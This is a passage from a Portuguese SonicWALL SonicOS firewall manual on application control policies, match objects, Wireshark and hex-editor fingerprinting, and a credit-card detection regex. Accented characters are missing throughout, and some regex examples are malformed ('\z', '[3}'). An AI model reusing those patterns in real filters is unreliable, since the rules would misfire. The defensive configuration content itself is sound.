Firewall > Objetos de largura de banda na pgina 633
Firewall > Objetos de endereo de e-mail na pgina 633
Verificar configurao do controle de aplicativos na pgina 634
Casos de uso do controle de aplicativos na pgina 641
Configurar uma poltica de regras de aplicativos

Quando voc tiver criado um objeto de correspondncia e, opcionalmente, um objeto de
endereo de e-mail ou ao, voc est pronto para criar uma poltica que os usa.
Para obter informaes sobre como usar o assistente de controle de aplicativos para criar uma
poltica, consulte Usar o assistente de Controle de aplicativos na pgina 624.
Para obter informaes sobre as polticas e os tipos de polticas, consulte Criao de poltica
de regras de aplicativos na pgina 584.

Para configurar uma poltica de regras de aplicativos, execute as seguintes etapas:
Etapa 1 Acesse Firewall > Regras de aplicativos.

Etapa 2 No painel Polticas de regras de aplicativos, clique em Adicionar nova poltica.
Etapa 3 Na janela Configuraes da poltica de controle de aplicativos, digite um nome descritivo

no campo Nome da poltica.
Etapa 4 Selecione um Tipo de poltica na lista suspensa Sua seleo aqui afetar as opes
disponveis na janela. Para obter informaes sobre os tipos de polticas disponveis, consulte
Criao de poltica de regras de aplicativos na pgina 584.
Etapa 5 Selecione um grupo de endereos ou um objeto de endereo de origem e destino nas listas
suspensas Endereo. Est disponvel somente um nico campo de Endereo para os tipos
de polticas Contedo do IPS, Contedo do controle de aplicativos ou CFS.
Etapa 6 Selecione o servio de origem ou destino nas listas suspensas Servio. Alguns tipos de
polticas no fornecem uma opo de servio.
Etapa 7 Relativamente a Endereo de excluso, selecione opcionalmente um grupo de endereo ou
objeto de endereo na lista suspensa. Este endereo no ser afetado pela poltica.
Etapa 8 Relativamente a Objeto de correspondncia, selecione um objeto de correspondncia na
lista suspensa. A lista contm os objetos de correspondncia definidos que so aplicveis ao
tipo de poltica. Quando o tipo de poltica Cliente HTTP, voc tambm pode selecionar
opcionalmente um Objeto de correspondncia de excludo.

O objeto de correspondncia excludo permite diferenciar subdomnios na poltica. Por
exemplo, se desejar permitir news.yahoo.com, mas bloquear todos os outros sites yahoo.com,
voc dever criar objetos de correspondncia para yahoo.com e news.yahoo.com. Voc deve
ento criar uma poltica com o objeto de correspondncia yahoo.com e com o objeto de
correspondncia excludo news.yahoo.com.
Nota O objeto de correspondncia de excluso no produzir efeito quando o tipo de objeto de

correspondncia estiver definido para Objeto personalizado. Os objetos personalizados no
podem ser selecionados como objeto de correspondncia de excluso.
Etapa 9 Relativamente a Ao, selecione uma ao a partir da lista suspensa. A lista contm aes
que so aplicveis ao tipo de poltica e pode incluir as aes predefinidas, alm de quaisquer
aes personalizadas. Para uma poltica de apenas log, selecione Nenhuma ao.
Etapa 10 Relativamente a Usurios/Grupos, selecione das listas suspensas para Includo e Excludo.
Os usurios ou o grupo selecionados em Excludo no sero afetados pela poltica.
Etapa 11 Se o tipo de poltica for Cliente SMTP, selecione nas listas suspensas de E-MAIL DE e RECEB
PARA, para Includo e Excludo. Os usurios ou o grupo selecionados em Excludo no
sero afetados pela poltica.
Etapa 12 Relativamente a Cronograma, selecione na lista suspensa. A lista oferece uma variedade de
cronogramas para que a poltica produza efeito.
Etapa 13 Se voc desejar que a poltica crie uma entrada de log quando for encontrada uma
correspondncia, marque a caixa de seleo Habilitar registro em log.
Etapa 14 Para registrar mais detalhes no log, marque a caixa de seleo Registrar contedo de objeto
individual.
Etapa 15 Se o tipo de poltica for Contedo do IPS, marque a caixa de seleo Registrar usando
formato de mensagem IPS para exibir a categoria na entrada do log como "Preveno de
intruso" em vez de "Controle de aplicativos" e para usar um prefixo como "Alerta de deteco
de IPS" na mensagem de log em vez de "Alerta de controle de aplicativos". Isso til se voc
desejar usar filtros de log para pesquisar alertas de IPS.
Etapa 16 Se o tipo de poltica for Contedo do controle de aplicativos, marque a caixa de seleo
Registrar usando formato de mensagem de Controle de aplicativos para exibir a categoria
na entrada de log como "Controle de aplicativos" e para usar um prefixo, como "Alerta de
deteco de controle de aplicativos" na mensagem de log. Isso til se voc quiser usar filtros
de log para pesquisar alertas de Controle de aplicativos.
Etapa 17 Se o tipo de poltica for CFS, marque a caixa de seleo Registrar usando formato de
mensagem CFS para exibir a categoria na entrada de log como "Acesso rede" e para usar
uma mensagem de log, como "Acesso ao site da Web negado" na mensagem de log, em vez
de nenhum prefixo. Isso til se voc desejar usar filtros de log para pesquisar alertas de
filtragem de contedo.
Etapa 18 Relativamente a Filtro de redundncia de log, voc poder selecionar Configuraes
globais para usar o valor global definido na pgina Firewall > Regras de aplicativos ou voc
pode inserir um nmero de segundos de atraso entre cada entrada de log para esta poltica. A
configurao local substitui a configurao global apenas para esta poltica; outras polticas
no so afetadas.
Etapa 19 Relativamente a Lado da conexo, selecione na lista suspensa. As opes disponveis
dependem do tipo de poltica e podem incluir Do lado do cliente, Do lado do servidor ou
Ambos, referindo-se ao lado onde o trfego tem origem. Os tipos de polticas Contedo do
IPS, Contedo do controle de aplicativos ou CFS no fornecem esta opo de configurao.

Etapa 20 Relativamente a Direo, clique em Bsica ou Avanada e selecione uma direo na lista
suspensa. Bsica permite que voc selecione a direo de entrada, de sada ou ambas.
Avanada permite que voc selecione entre zonas, como de LAN para WAN. Os tipos de
polticas Contedo do IPS, Contedo do controle de aplicativos ou CFS no fornecem esta
opo de configurao.
Etapa 21 Se o tipo de poltica for Contedo do IPS, Contedo do controle de aplicativos ou CFS,
selecione uma zona na lista suspensa Zona. A poltica ser aplicada a essa zona.
Etapa 22 Se o tipo de poltica for CFS, selecione uma entrada na lista de suspensa Lista de permisses
do CFS. A lista contm qualquer tipo de objetos de correspondncia definido de Lista de
permisso/proibio do CFS e tambm oferece Nenhuma como uma seleo. Os domnios
na entrada selecionada no sero afetados pela poltica.
Etapa 23 Se o tipo de poltica for CFS, selecione uma entrada na lista suspensa Lista de proibies do
CFS. A lista contm qualquer tipo de objetos de correspondncia definido de Lista de
permisso/proibio do CFS e tambm oferece Nenhuma como uma seleo. Ser negado
o acesso a contedo correspondente aos domnios na entrada selecionada, em vez de ter a
ao definida aplicada.
Etapa 24 Se o tipo de poltica for CFS, marque a caixa de seleo Habilitar imposio de pesquisa
segura para evitar que a imposio de pesquisa segura seja desabilitada em mecanismos de
busca como Google, Yahoo, Bing e outros.
Etapa 25 Se o tipo de poltica for CFS, selecione Habilitar YouTube para escolas e digite sua ID da
escola para habilitar o recurso YouTube para escolas. Para obter mais informaes, consulte
YouTube for School no suporte de filtragem de contedo na pgina 1190.
Usar o assistente de Controle de aplicativos

O assistente Controle de aplicativos fornece configurao segura de polticas de controle de
aplicativos para muitos casos de uso comum, mas no para todos. Se, a qualquer momento
durante o assistente, voc no conseguir encontrar as opes desejadas, voc pode clicar em
Cancelar e continuar usando a configurao manual. Ao configurar manualmente, voc deve
lembrar-se de configurar todos os componentes, incluindo objetos de correspondncia, aes,
objetos de endereo de e-mail se necessrio e, finalmente, uma poltica que os referencia.
Para informaes sobre o procedimento de criao manual de polticas, consulte Configurar
uma poltica de regras de aplicativos na pgina 620.
Para usar o assistente para configurar o Controle de aplicativos, execute as seguintes etapas:
Etapa 1 Faa login no dispositivo de segurana de rede Dell SonicWALL.

Etapa 2 No banner do firewall na parte superior da tela, clique no cone Assistentes. A tela Bem-
vindo(a) dos assistentes ser exibida.
Etapa 3 Selecione o boto de opo Assistente do Controle de aplicativos e, em seguida, clique em
Avanar.
Etapa 4 Na tela Introduo ao assistente do Controle de aplicativos, clique em Avanar.
Etapa 5 Na tela Tipo de poltica de Controle de aplicativos, selecione um tipo de poltica e, em
seguida, clique em Avanar.
Voc pode escolher a transferncia de arquivos SMTP, POP3 de entrada, Acesso Web
ou FTP. A poltica que voc criar s se aplica ao tipo de trfego que voc selecionar. A
prxima tela ir variar, dependendo de sua escolha aqui.

Etapa 6 Na tela Selecionar regras <sua escolha> para o Controle de aplicativos, selecione uma
regra de poltica nas opes fornecidas e, em seguida, clique em Avanar.
Dependendo da sua escolha na etapa anterior, a tela uma das quatro telas possveis:
Selecionar as regras de SMTP para o Controle de aplicativos
Selecionar as regras de POP3 para o Controle de aplicativos
Selecionar as regras de acesso da Web para o Controle de aplicativos
Selecionar as regras de FTP para o Controle de aplicativos
Etapa 7 A tela exibida aqui poder variar, dependendo de sua escolha de regras de polticas na etapa
anterior. Para as seguintes regras de polticas, o assistente mostra a tela Definir palavras-
chave e direo da poltica do objeto do Controle de aplicativos na qual voc poder
selecionar a direo de trfego a verificar e o contedo ou as palavras-chave a corresponder.
Todos os tipos de regras da poltica de SMTP, exceto Especificar o tamanho mximo
do e-mail
Todos os tipos de regras da poltica de POP3
Todos os tipos de regras da poltica de acesso da Web, exceto Buscar o uso de
determinados navegadores da Web e Buscar o uso de qualquer navegador da
Web, exceto os especificados
Todos os tipos de poltica de FTP, exceto Tornar todo o acesso FTP somente leitura
e No permitir o uso do comando SITE
Na tela Definir palavras-chave e direo da poltica do objeto de Controle de
aplicativos, execute as seguintes etapas:
Na lista suspensa Direo, selecione a direo do trfego a verificar na lista suspensa.
Selecione uma das opes de Entrada, Sada ou Ambas.
Efetue uma das seguintes aes:
Nota Se voc tiver selecionado uma opo com as palavras exceto as especificadas
na etapa anterior, o contedo que voc inserir aqui ser o nico contedo que
no far com que a ao ocorra. Consulte Correspondncia negativa na
pgina 599.
Na caixa de texto Contedo, digite ou cole um texto ou uma representao

hexadecimal do contedo para correspondncia e, em seguida, clique em
Adicionar. Repita at todo o contedo ser adicionado caixa de texto Lista.
Para importar palavras-chave a partir de um arquivo de texto predefinido que
contenha uma lista de valores de contedo, um por linha, clique em Carregar a
partir de arquivo.
Clique em Avanar.
Se voc selecionou um tipo de poltica na etapa anterior que no resultou na tela Definir
palavras-chave e direo da poltica do objeto de Controle aplicativos com as opes-
padro, o assistente exibe uma tela que permite selecionar a direo de trfego e outras
opes especficas, dependendo do tipo de poltica.
Na lista suspensa Direo, selecione a direo de trfego a verificar.
SMTP: Na tela Definir o tamanho mximo do e-mail, na caixa de texto Tamanho
mximo do e-mail, digite o nmero mximo de bytes de uma mensagem de e-mail.

Acesso da Web: Na tela Configuraes do objeto de Controle de aplicativos, a
caixa de texto Contedo tem uma lista suspensa com um nmero limitado de opes
e no est disponvel nenhum boto de Carregar a partir de arquivo. Selecione um
navegador na lista suspensa.
FTP: Na tela de caso especial Definir palavras-chave e direo da poltica do
objeto de Controle de aplicativos, voc pode selecionar apenas a direo do trfego
a verificar.
Clique em Avanar.
Etapa 8 Na tela Configuraes de ao do Controle de aplicativos, selecione a ao a ser
executada quando for encontrado contedo correspondente no tipo especificado de trfego de
rede e, em seguida, clique em Avanar.
Voc ver uma ou mais das seguintes opes, dependendo do tipo de poltica, conforme
mostrado abaixo:
Tipo de
poltica Ao disponvel
Todos os tipos Somente log
Todos os tipos Ignorar DPI
SMTP Ao de bloqueio bloquear e enviar resposta de e-mail personalizada
SMTP Ao de bloqueio bloquear sem enviar resposta de e-mail
SMTP Adicionar banner de e-mail (inclua texto na parte final do e-mail)
POP3 Ao de bloqueio desativar anexo e adicionar texto personalizado
Acesso da Web Ao de bloqueio pgina de bloqueio personalizada
Acesso da Web Ao de bloqueio redirecionar para nova localizao
Acesso da Web Ao de bloqueio Redefinir conexo
Acesso da Web Gerenciar largura da banda
Etapa 9 Na segunda tela Configuraes da ao do Controle de aplicativos (se for exibida), na

caixa de texto Contedo, digite o texto ou URL que deseja usar e, em seguida, clique em
Avanar.
A segunda tela Configuraes da ao do Controle de aplicativos somente exibida
quando voc tiver selecionado uma ao na etapa anterior que requer texto adicional. Para
um tipo de poltica de acesso Web, se voc tiver selecionado uma ao que redireciona
o usurio, voc pode digitar a nova URL na caixa de texto Contedo.
Etapa 10 Na tela Selecionar nome para poltica de Controle de aplicativos, na caixa de texto Nome
da poltica, digite um nome descritivo para a poltica e, em seguida, clique em Avanar.
Etapa 11 Na tela Confirmar configuraes da poltica, examine os valores exibidos da nova poltica e
execute um dos procedimentos a seguir:
Para criar uma poltica usando os valores de configurao exibidos, clique em Aplicar.
Para alterar um ou mais dos valores, clique em Voltar.
Para sair do assistente sem criar a poltica, clique em Cancelar.
Etapa 12 Para sair do assistente na tela Poltica de Controle de aplicativos concluda, clique em
Fechar.

Nota Voc pode configurar polticas de Controle de aplicativos sem usar o assistente. Ao
configurar manualmente, voc deve lembrar-se de configurar todos os componentes,
incluindo objetos de correspondncia, aes, objetos de endereo de e-mail se necessrio
e, finalmente, uma poltica que os referencia.
Firewall > Objetos de correspondncia

Esta seo descreve como criar manualmente um objeto de correspondncia. Para obter
informaes detalhadas sobre os tipos de objetos de correspondncia, consulte Objetos de
correspondncia na pgina 589.
Para configurar um objeto de correspondncia, execute as seguintes etapas:
Etapa 1 No painel de navegao no lado esquerdo, clique em Firewall e, em seguida, clique em

Objetos de correspondncia.

Etapa 2 Na tela Objetos de correspondncia, clique em Adicionar novo objeto de correspondncia.
Etapa 3 Na janela Configuraes do objeto de correspondncia, na caixa de texto Nome do objeto,
digite um nome descritivo para o objeto.
Etapa 4 Selecione um Tipo de objeto de correspondncia na lista suspensa. Sua seleo aqui afeta
as opes disponveis nesta tela. Consulte Objetos de correspondncia na pgina 589 para
obter uma descrio de tipos de objeto de correspondncia.
Etapa 5 Selecione um Tipo de correspondncia na lista suspensa As selees disponveis dependem
do tipo de objeto de correspondncia.
Etapa 6 Relativamente a Representao de entrada, clique em Alfanumrico para fazer
corresponder um padro de texto ou clique em Hexadecimal se desejar fazer corresponder
contedo binrio.
Etapa 7 Na caixa de texto Contedo, digite o padro de correspondncia e, em seguida, clique em
Adicionar. O contedo exibido na caixa de texto Lista. Repita para adicionar outro elemento
de correspondncia.

Se o Tipo de correspondncia for Correspondncia de regex, voc poder selecionar
expresses comuns predefinidas e clicar em Selecionar para adicion-las Lista. Tambm
pode digitar uma expresso comum personalizada no campo Contedo e clicar em Adicionar
para adicion-la Lista.
Como alternativa, voc pode clicar em Carregar a partir de arquivo para importar uma lista
de elementos de um arquivo de texto. Cada elemento no arquivo deve estar em uma linha
prpria.
Etapa 8 Para remover um elemento da lista, selecione o elemento na caixa Lista e, em seguida, clique
em Remover. Para remover todos os elementos, clique em Remover tudo.

Configurar objetos da lista de aplicativos
Esta seo descreve como criar um objeto da lista de aplicativos, o qual pode ser usado por
polticas de Controle de aplicativos da mesma forma que um objeto de correspondncia.
Para obter informaes detalhadas sobre os tipos de objeto da lista de aplicativos que incluem
informaes sobre a guia Segurana e a guia Categoria, consulte Objetos da lista de
aplicativos na pgina 600.
Para configurar um objeto da lista de aplicativos, execute as seguintes etapas:

Objetos de correspondncia.
Etapa 2 Prximo parte inferior da pgina, clique no boto Adicionar objeto da lista de aplicativos.
A pgina Criar objeto de correspondncia ser aberta.

Voc pode controlar quais aplicativos so mostrados selecionando uma ou mais categorias de
aplicativos, nveis de ameaa e tecnologias. Quando a lista de aplicativos reduzida para uma
lista que se concentra em suas preferncias, voc pode selecionar os aplicativos individuais
para seu filtro.
Etapa 3 No campo Pesquisar prximo do canto superior direito da pgina, digite opcionalmente parte
de um nome de aplicativo e clique no cone Pesquisar para pesquisar aplicativos com essa
palavra em seus nomes.
Etapa 4 No painel Categoria, marque as caixas de seleo para uma ou mais categorias de aplicativo.
Etapa 5 No painel Nvel de ameaa, marque as caixas de seleo para um ou mais nveis de ameaa.
Etapa 6 No painel Tecnologia, marque as caixas de seleo para uma ou mais tecnologias.
Etapa 7 Clique no sinal de adio prximo a cada aplicativo que voc deseja adicionar ao seu objeto
de filtro. Para exibir uma descrio do aplicativo, clique em seu nome na coluna Nome. Como
voc seleciona os aplicativos para o seu filtro, o cone do sinal de adio muda para um cone
de marca de seleo verde e os aplicativos selecionados aparecem no painel Grupo de
aplicativos direita. Voc pode editar a lista neste campo excluindo itens individuais ou
clicando na borracha para excluir todos os itens.
Etapa 8 Ao terminar de selecionar os aplicativos para incluir, digite um nome para o objeto no campo
Nome do objeto de correspondncia.
Etapa 9 Clique no boto Salvar objeto de correspondncia de aplicativo. Voc ver o nome do
objeto listado na pgina Firewall > Objetos de correspondncia com um tipo de objeto da Lista
de aplicativos. Este objeto pode ser selecionado ao criar uma poltica de regras de
aplicativos.
Firewall > Objetos de ao

Se voc no desejar uma das aes predefinidas, voc pode selecionar uma das aes
configurveis. A janela Configuraes do objeto da ao, mostrada abaixo, permite
personalizar uma ao configurvel com texto ou uma URL. As aes predefinidas e quaisquer
aes configurveis que voc criou esto disponveis para seleo quando voc criar uma
poltica de regras de aplicativo. Para obter mais informaes sobre aes, consulte Objetos de

ao na pgina 602.
Para definir as configuraes de uma ao, execute as seguintes etapas:

Objetos de ao.
Etapa 2 Na tela Objetos de ao, clique em Adicionar novo objeto de ao.
Etapa 3 Na janela Configuraes do objeto da ao, digite um nome descritivo para a ao.
Etapa 4 Na lista suspensa Aes, selecione a ao que voc desejar.
Etapa 5 Na caixa de texto Contedo, digite o texto ou URL a ser usado na ao.
Etapa 6 Se a opo Bloquear Pgina HTTP foi selecionada como a ao, exibida a lista suspensa
Cor. Selecione uma cor de fundo para a pgina de bloqueio na lista suspensa Cor. As opes
de cor so branco, amarelo, vermelho ou azul.
Firewall > Objetos de endereos
Nota Para maior convenincia e acessibilidade, a pgina Objetos de endereos pode ser
acessada a partir de Rede > Objetos de endereos ou Firewall > Objetos de endereos. A
pgina idntica, independentemente da guia atravs da qual acessada. Para obter
informaes sobre a configurao de objetos de endereos, consulte Rede > Objetos de
endereos na pgina 275.
Firewall > Objetos de servios
Nota Para maior convenincia e acessibilidade, a pgina Objetos de servios pode ser acessada
a partir de Firewall > Objetos de servios ou Rede > Servios. A pgina idntica,
independentemente da guia atravs da qual acessada. Para obter informaes sobre a
configurao de objetos de endereos, consulte Rede > Servios na pgina 293.

Firewall > Objetos de largura de banda
Para obter informaes sobre a configurao de objetos de largura de banda, consulte
Configurando objetos de largura de banda na pgina 569 e Configuraes de firewall > BWM
na pgina 677.
Firewall > Objetos de endereo de e-mail

Voc pode criar objetos de endereo de e-mail para usar com polticas de cliente SMTP. Um
objeto de endereo de e-mail pode ser uma lista de usurios ou um domnio completo. Para
obter mais informaes sobre os objetos de endereo de e-mail, consulte Objetos de endereo
de e-mail na pgina 605.
Para definir configuraes do objeto de endereo de e-mail, execute as seguintes etapas:

Objetos de endereo de e-mail.
Etapa 2 Na tela Objetos de endereo de e-mail, clique em Adicionar novo objeto de endereo de
e-mail.
Etapa 3 Na janela Objeto de endereo de e-mail, digite um nome descritivo para o objeto de endereo
de e-mail.
Etapa 4 Para Tipo de correspondncia, selecione Correspondncia exata ou Correspondncia
parcial. Use a Correspondncia parcial quando desejar fazer correspondncia em qualquer
parte do endereo de e-mail que voc fornea. Para fazer corresponder o endereo de e-mail
de forma exata, selecione Correspondncia exata.
Etapa 5 Na caixa de texto Contedo, digite o contedo a corresponder e, em seguida, clique em
Adicionar. Repita esta etapa at ter adicionado os elementos desejados.
Por exemplo, para corresponder em um domnio, selecione Correspondncia parcial na
etapa anterior e, em seguida, digite @ seguido do nome do domnio no campo Contedo, por
exemplo, digite: @sonicwall.com. Para fazer corresponder um usurio individual, selecione
Correspondncia exata na etapa anterior e, em seguida, digite o endereo de e-mail completo
no campo Contedo, por exemplo: jsmith@sonicwall.com.

Como alternativa, voc pode clicar em Carregar a partir de arquivo para importar uma lista
de elementos de um arquivo de texto. Cada elemento no arquivo deve estar em uma linha
prpria.
Ao definir um objeto de endereo de e-mail com uma lista de usurios, voc pode usar o
Controle de aplicativos para simular grupos.
Verificar configurao do controle de aplicativos

Para verificar a configurao de sua poltica, voc pode enviar algum trfego que dever
corresponder sua poltica. Voc pode usar um analisador de protocolo de rede como o
Wireshark para visualizar os pacotes. Para obter informaes sobre como usar o Wireshark,
consulte Wireshark na pgina 634.
Certifique-se de testar os usurios e os grupos includos e excludos. Voc tambm deve
executar testes de acordo com a programao que voc configurou para determinar que a
poltica est em vigor quando voc desejar que ele fique. Verifique as entradas de log na tela
Log > Ver na interface de usurio do SonicOS.
Voc pode ver dicas de ferramenta na pgina Firewall > Regras de aplicativos quando passar
o cursor sobre cada poltica. As dicas de ferramenta mostram detalhes dos objetos de
correspondncia e das aes da poltica. Alm disso, a parte inferior da pgina mostra o
nmero de polticas definidas, habilitadas e o nmero mximo de polticas permitidas.
Ferramentas teis
Esta seo descreve duas ferramentas de software que podem ajud-lo a utilizar o Controle
de aplicativos nas suas capacidades mximas. So descritas as seguintes ferramentas:
Wireshark na pgina 634
Editor hexadecimal na pgina 637
Wireshark
Wireshark um analisador de protocolos de rede que voc pode usar para capturar pacotes
de aplicativos em sua rede. Voc pode examinar os pacotes para determinar o identificador
exclusivo de um aplicativo que voc pode usar para criar um objeto de correspondncia para
uso em uma poltica de regras de aplicativos.
Wireshark est disponvel gratuitamente em: http://www.wireshark.org
O processo de encontrar o identificador exclusivo ou a assinatura de um navegador da Web
ilustrado na seguinte sequncia de captura de pacotes.

Etapa 1 No Wireshark, clique em Capturar > Interfaces para exibir as interfaces de rede local.
Etapa 2 Na caixa de dilogo Capturar interfaces, clique em Capturar para iniciar uma captura em sua
interface de rede principal:
Assim que a captura iniciar, inicie o navegador e, em seguida, interrompa a captura. Neste exemplo, o Firefox iniciado.

Etapa 3 Na sada capturada, localize e clique no comando HTTP GET no painel superior e exiba a
origem dele no painel central. No cdigo-fonte, localize a linha iniciando com Agente do
usurio.
Etapa 4 Role para a direita para localizar o identificador exclusivo do navegador. Neste exemplo,
Firefox/1.5.0.7.

Etapa 5 Digite o identificador na caixa de texto Contedo na tela Configuraes do objeto de
correspondncia e clique em OK para criar um objeto de correspondncia que voc pode
usar em uma poltica.
Editor hexadecimal
possvel usar um editor hexadecimal (hex) para visualizar a representao hexadecimal de
um arquivo ou uma imagem grfica. Um editor hexadecimal desse tipo XVI32, desenvolvido
por Christian Maas e disponvel sem custo na seguinte URL:
http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm
Por exemplo, se houver um determinado grfico em todos os documentos confidenciais da
empresa, voc poder usar o editor hexadecimal para obter um identificador exclusivo para o
grfico e, em seguida, usar a identificao de cadeia de caracteres hexadecimal para criar um
objeto de correspondncia. Voc poderia referenciar o objeto de correspondncia em uma
poltica que bloqueia a transferncia de arquivos com o contedo correspondendo a esse
grfico.
Usando o grfico da SonicWALL como um exemplo, execute as seguintes etapas:

Etapa 1 Inicie XVI32 e clique em Arquivo > Abrir para abrir o arquivo GIF da imagem grfica.
Etapa 2 No painel esquerdo, marque os primeiros 50 blocos de caracteres hexadecimais selecionando

a opo Editar > Bloquear <n> caracteres... e, em seguida, selecione a opo decimal e
digite 50 no espao fornecido. Isto ir marcar os primeiros 50 caracteres no arquivo, o que
suficiente para gerar uma impresso digital exclusiva para uso em um objeto de
correspondncia personalizado.
Como alternativa, voc pode marcar o bloco usando a seguinte sequncia:
Clique no primeiro caractere (#0).
Pressione Ctrl+B.
Clique no caractere na posio #49.
Pressione Ctrl+B.
Para localizar o caractere na posio #49, clique em um caractere no painel direita (o painel
de texto) e, em seguida, localize no canto inferior esquerdo o endereo decimal. Tente
diferentes caracteres at ser apresentado Adr. dec: 49. Observe que voc deve clicar no local
correspondente no painel esquerdo antes de pressionar Ctrl+B para marcar o bloco.

Quando o bloco estiver marcado, ele alterado para uma fonte vermelha. Para desmarcar um
bloco de caracteres, pressione Ctrl+U.
Etapa 3 Depois de marcar o bloco, clique em Editar > rea de transferncia > Copiar como cadeia
de caracteres hexadecimal.
Etapa 4 No Textpad ou outro editor de texto, pressione Ctrl+V para colar a seleo e, em seguida,
pressione Enter para terminar a linha.
Esta etapa intermediria necessria para permitir que voc remova espaos da cadeia de
caracteres hexadecimal.
Etapa 5 No Textpad, clique em Pesquisar > Substituir para abrir a caixa de dilogo Substituir. Na
caixa de dilogo Substituir, digite um espao na caixa de texto Localizar e deixe a caixa de
texto Substituir em branco. Clique em Substituir tudo.
A cadeia de caracteres hexadecimal agora tem 50 caracteres hexadecimais sem espaos entre
eles.
Etapa 6 Clique duas vezes na cadeia de caracteres hexadecimal para selecion-la e, em seguida,
pressione Ctrl+C para copi-la para a rea de transferncia.
Etapa 7 Na interface de usurio do SonicOS, navegue at Firewall > Objetos de correspondncia e
clique em Adicionar objeto de correspondncia.
Etapa 8 Na janela Configuraes do objeto de correspondncia, digite um nome descritivo na caixa
de texto Nome do objeto.
Etapa 9 Na lista suspensa Tipo de objeto de correspondncia, selecione Objeto personalizado.
Etapa 10 Para representao de entrada, clique em Hexadecimal.

Etapa 11 Na caixa de texto Contedo, pressione Ctrl+V para colar o contedo da rea de transferncia.

Agora voc tem um objeto de correspondncia com um identificador exclusivo para a imagem.
Voc pode criar uma poltica de regras de aplicativos para bloquear ou registrar trfego que
contm a imagem correspondida por este objeto de correspondncia. Para obter informaes
sobre a criao de uma poltica, consulte Configurar uma poltica de regras de aplicativos na
pgina 620.

Casos de uso do controle de aplicativos
O Controle de aplicativos fornece a funcionalidade para lidar com vrios tipos de controle de
acesso de maneira bastante eficiente. Os seguintes casos de uso so apresentados nesta
seo:
Criar uma expresso comum em um objeto de correspondncia na pgina 641
Controle de aplicativos baseado em polticas na pgina 642
Imposio da conformidade na pgina 645
Proteo para servidores na pgina 645
Ambientes de e-mail hospedado na pgina 645
Controle de e-mail na pgina 646
Controle do navegador da Web na pgina 647
Controle de HTTP Post na pgina 648
Controle de tipo de arquivo proibido na pgina 650
Controle ActiveX na pgina 653
Controle de FTP na pgina 654
Ignorar DPI na pgina 659
Assinatura personalizada na pgina 660
Preveno de explorao de shell inverso na pgina 663
Criar uma expresso comum em um objeto de correspondncia

As expresses comuns predefinidas podem ser selecionadas durante a configurao e voc
pode configurar uma expresso comum personalizada. Este caso de uso descreve como criar
um objeto de correspondncia de regex para um nmero de carto de crdito, enquanto ilustra
alguns erros comuns.
Por exemplo, um usurio cria um objeto de correspondncia de regex para um nmero de
carto de crdito com a seguinte construo ineficiente e tambm ligeiramente errnea:
[1-9][0-9]{3} ?[0-9]{4} ?[0-9]{4} ?[0-9]{4}
Usando este objeto, o usurio tenta criar uma poltica. Aps o usurio clicar em OK, o
dispositivo exibe a mensagem "Aguarde...", mas a sesso de gerenciamento no responde por
um longo perodo de tempo e a expresso comum poder eventualmente ser rejeitada.
Este comportamento ocorre porque, no objeto personalizado e nos objetos de correspondncia
de contedo do arquivo, as expresses comuns recebem implicitamente um prefixo com um
ponto e asterisco (.*). Um ponto corresponde a qualquer um dos 256 caracteres ASCII, exceto
"\n". Este fato, o tipo de objeto de correspondncia usado e a natureza da expresso comum
em combinao fazem com que o plano de controle leve muito tempo a compilar as estruturas
de dados necessrias.
A correo para isto a colocao de um prefixo na expresso comum com um "\D". Isso
significa que o nmero do carto de crdito antecedido por um caractere no numrico, o
que, na verdade, torna a expresso comum mais precisa.
Alm disso, a expresso comum mostrada acima no representa com preciso o nmero do
carto de crdito desejado. A expresso regular na sua forma atual pode corresponder a vrios
falsos positivos, tal como 1234 12341234 1234. A seguir encontra-se uma representao
mais precisa:

\D[1-9][0-9]{3} [0-9]{4} [0-9]{4} [0-9]{4}
ou
\D[1-9][0-9]{3}[0-9]{4}[0-9]{4}[0-9]{4}
que pode ser escrita de forma mais concisa como:

\D\z\d{3}( \d{4}){3}
ou
\D\z\d{3}(\d{4})[3}
, respectivamente.
Estas podem ser escritas como duas expresses regulares em um objeto de correspondncia
ou podem ser compactadas em uma expresso regular como:
\D\z\d{3}(( \d{4}){3}|(\d{12}))
Voc tambm pode capturar nmeros de carto de crdito com dgitos separados por "" com
a seguinte expresso comum:
\D\z\d{3}(( \d{4}){3}|(-\d{4}){3}|(\d{12}))
O "\D" que antecede deve ser includo em todas as expresses comuns deste tipo.
Controle de aplicativos baseado em polticas

Os bancos de dados de assinatura do aplicativo Dell SonicWALL fazem parte do recurso de
Controle de aplicativos, permitindo um controle muito granular relativamente configurao de
polticas e s aes relacionadas a eles. Esses bancos de dados de assinatura so usados
para proteger os usurios contra as vulnerabilidades de aplicativos, bem como worms, cavalos
de Troia, transferncias de ponto a ponto, spyware e backdoors. O idioma usado da assinatura
extensvel no mecanismo Reassembly Free Deep Packet Inspection da Dell SonicWALL
tambm fornece defesa proativa contra recm-descobertas de vulnerabilidades de aplicativos
e protocolos.
Para criar uma poltica de Controle de aplicativos, crie primeiro um objeto de correspondncia
do tipo Lista de assinatura de aplicativo ou Lista de categorias de assinatura de aplicativo.
Esses dois tipos permitem a seleo de categorias gerais do aplicativo ou assinaturas
individuais de aplicativo.

O exemplo a seguir mostra um objeto de correspondncia direcionado para aplicativos de
compartilhamento ponto a ponto LimeWire e Napster.

Depois de criar um objeto de correspondncia baseado em assinatura, crie uma nova poltica
de regras de aplicativo do tipo de Contedo do controle de aplicativos que usa o objeto de
correspondncia. O exemplo a seguir mostra uma poltica que usa o recm-criado objeto de
correspondncia "Napster/LimeWire P2P" para descartar todo o trfego de Napster e
LimeWire.
Registrar em log polticas baseadas em assinatura de aplicativos

Como acontece com outros tipos de poltica de objeto de correspondncia, o registro em log
pode ser habilitado nas polticas de contedo do aplicativo. Por padro, estes logs so exibidos
no formato padro, mostrando a poltica de Controle de aplicativos que acionou o alerta/a
ao. Para obter mais informaes sobre o evento de log, marque a caixa de seleo
Registrar usando formato de mensagem de Controle de aplicativos na tela Configuraes
da poltica de controle de aplicativos dessa poltica.
Registro em log padro
Registro em log formatado do controle de aplicativos

Imposio da conformidade
Muitas empresas e organizaes precisam garantir a conformidade com suas polticas
relativamente transferncia de arquivos de sada. O Controle de aplicativos fornece essa
funcionalidade em contextos HTTP, FTP, POP3 e SMTP. Isso pode ajudar as empresas a
cumprir requisitos normativos, tais como HIPAA, SOX e PCI.
Ao configurar a poltica ou as polticas para essa finalidade, voc pode selecionar Direo >
Bsico > Sada para aplicar especificamente suas restries de transferncia de arquivos ao
trfego de sada. Alternativamente, voc pode selecionar Direo > Avanado e, em seguida,
